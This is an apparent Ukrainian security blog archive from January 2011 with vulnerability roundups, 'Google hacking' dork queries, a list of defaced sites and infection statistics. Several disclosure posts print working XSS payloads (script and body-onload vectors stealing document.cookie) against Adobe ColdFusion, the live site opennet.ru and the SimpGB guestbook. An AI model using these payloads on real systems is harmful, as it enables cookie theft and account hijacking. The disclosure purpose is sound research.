Архів за Січень, 2011

Добірка уразливостей

15:14 28.01.2011

В даній добірці уразливості в веб додатках:

  • Sun Java JDK/JRE AWT Library Invalid Pointer Vulnerability (деталі)
  • Sun Java JDK/JRE AWT Library Invalid Index Vulnerability (деталі)
  • Sun Java JDK/JRE Soundbank Resource Parsing Buffer Overflow (деталі)
  • XSS in Horde IMP <=4.3.7, fetchmailprefs.php (деталі)
  • FreePBX recordings interface allows remote code execution (деталі)
  • Sun Java JDK/JRE Soundbank Resource Name Buffer Overflow (деталі)
  • Oracle Java Runtime Environment Image FIle Buffer Overflow Vulnerability (деталі)
  • SQL Injection and XSS in Motorito < v2.0 Ni 483 (деталі)
  • CollabNet Subversion Edge Log Parser XSS/Code Injection Vulnerability (деталі)
  • SQL injection vulnerability in Entrans (деталі)

Уразливості в Adobe ColdFusion

23:53 27.01.2011

В 2008 - 2010 роках я знаходив уразливості на багатьох сайтах на ColdFusion. Це SQL DB Structure Extraction, Full path disclosure та Cross-Site Scripting уразливості. В останнє я виявив подібні уразливості на www.sec.ru.

Вони мають місце на сторінці детального повідомлення про помилку (що часто виводиться на ColdFusion сайтах). І враховуючи те, що ці дірки відносяться до Adobe ColdFusion, 16.11.2010 я приватно повідомив про це Adobe, але вони проігнорували моє повідомлення. Тому я оприлюднюю детальну інформацію про уразливості.

SQL DB Structure Extraction:

http://site/page.cfm?id=-

Виводиться інформація про SQL запит (якщо даний веб додаток працює з СУБД).

Full path disclosure:

http://site/page.cfm?id=-

Виводиться повний шлях на сервері.

XSS:

При запиті до сторінки http://site/page.cfm?id=- з User-Agent “Mozilla<body onload=alert(document.cookie)>” можна було виконати код. Уразливість працювала в 2009 та 25.02.2010, зараз вона вже виправлена (вірогідно в останніх версіях ColdFusion).

XSS:

http://site/page.cfm?id=%3Cbody%20onload=alert(document.cookie)%3E

Вектор через тег script, що працював в 2009 та 25.02.2010, вже виправили в останніх версіях ColdFusion, але можна атакувати через багато інших векторів (наприклад, через тег body).

Уразливі потенційно всі версії Adobe ColdFusion.

Похакані сайти №131

22:40 27.01.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.tk-kiev.com.ua (хакером Down Twon HaCkEr) - 14.01.2011, зараз сайт вже виправлений адмінами
  • http://www.lie-detector.biz (хакерами з Albanian Hackers Group) - 20.01.2011, зараз сайт вже виправлений адмінами
  • http://shop.zdravnik.com.ua (хакером blood black)
  • http://15workdaily.com (хакером Dr.TaiGaR)
  • http://blog.arm-eko.rv.ua (хакерами з AHC)

Зазначу, що взломаний сайт 15workdaily.com - це e-commerce сайт з логотипами Verified by VISA, MasterCard SecureCode та VeriSign Secured. Про діряві сайти, що ховаються за секюріті логотипами я вже писав в статті Справжня безпека сайтів із секюріті логотипами, а це наочний приклад хакнутого подібного сайта.

Нові уразливості на www.opennet.ru

15:29 27.01.2011

14.06.2010

У листопаді, 05.11.2009, я знайшов Cross-Site Scripting уразливості (в тому числі persistent XSS) на секюріті проекті http://www.opennet.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на opennet.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.01.2011

XSS (persistent):

При доступі на сторінку http://www.opennet.ru /cgi-bin/opennet/bookmark.cgi?submit=add з заголовком:

Referer: http://www.opennet.ru/"><script>alert(document.cookie)</script>

Або через GET запит:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=http://www.opennet.ru/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує одразу, а також при заході на сторінку http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

Дані уразливості вже виправлені, але даний захист можна обійти використовуючи наступну Strictly social XSS:

Strictly social persistent XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=javascript:alert(document.cookie)//http://opennet.ru&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує при кліку на сторінці http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

З даних уразливостей все ще не всі виправлені.

Інфікованість Уанета за останні роки

22:48 26.01.2011

Починаючи з 2008 року я став проводити дослідження інфікованості сайтів в Уанеті та наводити інформацію про це в своїх звітах про хакерську активність в Уанеті. Наведу порівняльну статистику інфікованості Уанета за останні роки.

Статистика буде за 2008 - 2010 роки враховуючи, що лише з 2008 я веду статистику інфікованих сайтів. Статистичні дані базуються на моїх дослідженнях хакерської активності в Уанеті в 2008, 2009 і 2010 роках.

За весь 2008 рік в Уанеті було інфіковано 4 веб сайти.

За весь 2009 рік в Уанеті було інфіковано 67 веб сайтів.

За весь 2010 рік в Уанеті було інфіковано 264 веб сайтів.

Інфіковані сайти в Уанеті

Збільшення заражених сайтів свідчить про зростання кримінальних взломів сайтів (коли на взломаних сайтах розміщуються віруси).

Динаміка зараження сайтів в Уанеті.

В 2009 році активність зросла на 1575% порівняно з 2008 роком (зростання в 16,75 рази).

В 2010 році активність зросла на 294% порівняно з 2009 роком (зростання в 3,94 рази). В порівнянні з 2008 роком активність зросла на 6500% (в 66 разів).

Динаміка зараження сайтів в Уанеті

Як видно зі статистики, кількість інфікованих сайтів в Уанеті в останні роки стабільно зростає.

“Error” Google хакінг №2

19:04 26.01.2011

Продовжу тему “Error” Гугл хакінга (”Error” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information leakage уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “еррор” пошукових запитів:

“Fatal error”

“Fatal error: Call to undefined”

“Fatal error: Call to undefined function”

“Fatal error: Call to undefined method”

“Fatal error: Call to a member”

“Fatal error: Call to a member function”

“Fatal error: Allowed memory size”

“Parse error”

“Parse error: syntax error”

“Parse error: parse error”

Добірка уразливостей

15:10 26.01.2011

В даній добірці уразливості в веб додатках:

  • Sun Java Runtime CMM readMabCurveData Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment JPEGImageReader stepX Remote Code Execution Vulnerability (деталі)
  • Free Simple CMS path sanitization errors (деталі)
  • Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (деталі)
  • Sun Java Runtime Environment MIDI File metaEvent Remote Code Execution Vulnerability (деталі)
  • Sun Java JDK/JRE Unpack200 Buffer Overflow Vulnerability (деталі)
  • Reflected XSS in Atmail WebMail < v6.2.0 (деталі)
  • TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
  • BSI Hotel Booking System Admin Login Bypass Vulnerability (деталі)

Перевірка Flash файлів

22:48 25.01.2011

Про уразливості у флешках та пов’язаних з флешем я писав багато разів в себе в новинах за весь роботи мого сайта, зокрема в статтях XSS уразливості в 8 мільйонах флеш файлах та XSS уразливості в 34 мільйонах флеш файлах.

Aung Khant з YGN Ethical Hacker Group нещодавно презентував новий секюріті інструмент Known Flash-based XSS and Content spoofing Hunter. Це веб додаток на JavaScript, який перевіряє флешки на найбільш поширені уразливості.

Вам потрібно лише ввести URL флешки, яку ви бажаєте перевірити, і даний інструмент перевірить вказаний swf-файл на найбільш поширені Cross-Site Scripting and Content Spoofing уразливості. Він звісно не перевірить всіх можливих уразливостей (в тому числі всіх можливих варіантів XSS та Content Spoofing), але все рівно може стати в нагоді флеш розробникам та адмінам сайтів, що використовують флешки. Лише потрібно трохи покращити даний веб додаток, про що я вже написав автору.

А для більш детальної перевірки флешек на уразливості потрібно або самому їх детально перевіряти, або замовляти аудит безпеки.

Небезпека Full path disclosure уразливостей

19:10 25.01.2011

В новій главі свого Посібника з безпеки, про яку я згадував на минулому тижні, я розповів про небезпеки Full path disclosure уразливостей.

Витік повного шляху (Full path disclosure) - це уразливість, що призводить до витоку повного шляху на сервері. Це один з найбільш поширених витоків інформації, як я вже зазначав в своїх статтях про “Warning” Google хакінг та “Error” Google хакінг, де я наводив приклади пошукових запитів, що виводять мільйони вразливих сайтів. І Full path disclosure дірки несуть в собі небезпеку для сайтів.

Даний тип уразливостей може бути використаний:

  1. Для отримання інформації про структуру папок на сервері. Що може бути в подальшому використано для проведення Directory Traversal, Local File Inclusion та SSI Injection атак.
  2. Для знаходження прихованих ресурсів на сайті з отриманої структури папок.
  3. Для отримання інформації про логін до ftp акаунту та інших сервісів сервера.
  4. Для отримання інформації про назву БД та логін до акаунту СУБД.

Також в даній главі свого посібника я розповів про методи захисту від Full path disclosure уразливостей. Наведені методи захисту для мов програмування Perl і PHP.

Численні уразливості в SimpGB

15:02 25.01.2011

17.11.2010

У липні, 15.07.2010, я знайшов Cross-Site Scripting, Brute Force, Insufficient Anti-automation та Abuse of Functionality уразливості в SimpGB. Дані уразливості я виявив на різних сайтах, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

25.01.2011

XSS:

POST запит на сторінці http://site/guestbook.php в параметрах poster, postingid та location в функції Preview. Якщо в гостьовій книзі використовується капча, то для атаки необхідний робочий код капчі. Або через GET запит:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force:

http://site/admin/index.php

Insufficient Anti-automation:

http://site/admin/pwlost.php

В даному функціоналі немає захисту від автоматизованих запитів.

Abuse of Functionality:

http://site/admin/pwlost.php

В даному функціоналі можна виявляти логіни.

Уразливі SimpGB v1.49.02 та попередні версії.